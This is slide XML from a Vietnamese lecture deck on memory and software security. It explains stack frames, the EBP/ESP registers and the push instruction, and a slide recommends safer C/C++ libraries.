              </a:rPr>
              <a:t>*));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*q = &amp;x;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*p = 5;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> OK</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>**q = 3;</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87715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228-096A-54FE-7E87-65BAB182B1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6DC063-B28D-BF03-E601-1FDDD4896437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460784" y="1143000"/>
            <a:ext cx="4949416" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>Stack frame: vùng nhớ trên stack được tạo ra để lưu trữ dữ liệu cho một lời gọi hàm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>Tham số</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>Biến cục bộ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>Địa chỉ trả về</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>Stack bắt đầu ở địa chỉ cao và tăng trưởng về địa chỉ thấp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>Lưu trữ số nguyên: little-edian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>Lưu trữ mảng: từ ô có địa chỉ thấp đến địa chỉ cao</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>Các con trỏ tham chiếu tới stack frame:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>EBP(base pointer): trỏ vào đáy stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>ESP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>stack pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200"/>
              <a:t>): trỏ vào đỉnh stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0217FFC8-100A-90E5-0464-6845791DD785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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11" name="Google Shape;600;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D55107B-1E90-2435-3F15-EB872212476B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="747788983"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6739439" y="1524002"/>
          <a:ext cx="2186075" cy="434340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0"/>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2"/>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4"/>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5"/>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6"/>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7"/>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8"/>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9"/>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10"/>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11"/>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12"/>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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2895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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;601;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E82F37E0-71DD-41C8-77DC-D0EA267F2449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2590800"/>
            <a:ext cx="834616"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13" name="Google Shape;602;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E381A6EA-EC25-1B64-940D-401A646660C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="2836182"/>
            <a:ext cx="261664" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;603;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078598DA-EF04-A228-B26F-CF2C50B53DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="3657600"/>
            <a:ext cx="834616"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ESP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15" name="Google Shape;604;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F957521-512A-DABF-7C1B-F5DC85B93104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="3898631"/>
            <a:ext cx="261664" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;605;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C85040A-B7D7-D238-ED0E-B1BCAAA26CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="6903030" y="3028777"/>
            <a:ext cx="1826001" cy="738633"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;601;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C3FD38-37DA-9747-026E-DDD1C005EF54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310801" y="1456584"/>
            <a:ext cx="1618184"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Địa chỉ cao</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;601;p74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81343201-7D13-35CD-1050-A2F19A28BE2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292253" y="5503181"/>
            <a:ext cx="1618184"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Địa chỉ thấp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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9474104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314C-5105-43A3-90E9-51C95F407134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sử dụng các thư viện an toàn hơn</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70B88AA-73FE-4470-8B0D-A304DC4A584F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nên sử dụng chuẩn C/C++11 thay cho các chuẩn cũ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Sử dụng std::string trong C++ để xử lý xâu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Truyền dữ liệu qua mạng: sử dụng Google Protocol Buffers hoặc Apache Thrift</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDC346F-6877-498E-9C95-D5DD00FE667E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3655880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C70C-090D-6F6B-E4C6-4D79583EA4A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EF5A8EC-6DFC-29FE-A234-A90DDCC6372E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Bài giảng có sử dụng hình ảnh và ví dụ từ các khóa học:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-182880" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Computer Security, Berkeley University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-182880" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Computer and Network Security, Maryland University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE306E4-19C6-5A82-CC0D-3BF85854DE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101812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15F-3589-72B5-A348-80CF4D743ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>push</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34541D8-6B41-B4DE-2D1F-5E71B2886D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1040457"/>
            <a:ext cx="4419600" cy="5436543"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thêm một phần tử vào stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Giảm giá trị của ESP để cấp thêm bộ nhớ cho stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cất giá trị vào đỉnh stack(ô nhớ có địa chỉ thấp nhất)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: giá sử thanh ghi EAX có giá trị là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0xcafef00d</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51738F99-3079-67D0-C8AD-2922B598B4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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12" name="Google Shape;613;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C7E9B0-A8AB-A7E6-5E4F-C16C434631C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2736672452"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6781800" y="1040457"/>
          <a:ext cx="2186075" cy="2007278"/>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0"/>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1"/>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2"/>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3"/>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4"/>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;614;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D3D340-9E6A-5FF3-69C9-93B9B311133E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="990600"/>
            <a:ext cx="785484"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14" name="Google Shape;615;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFCC44A-32AA-253F-E2D4-F99A41B1B891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6271884" y="1159950"/>
            <a:ext cx="500100" cy="7608"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;616;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42F81E1-715C-C8D3-10AE-91E53FCEAF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="2167288"/>
            <a:ext cx="718325"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ESP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16" name="Google Shape;617;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E774AA-C672-1925-DDCE-C9EBAEB1AE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6280925" y="2336638"/>
            <a:ext cx="500100" cy="372"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;618;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D558FC-411F-0438-1C01-C91DD39391A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="6945391" y="1534975"/>
            <a:ext cx="1826001" cy="800189"/>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2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;625;p75">
            <a:extLst>
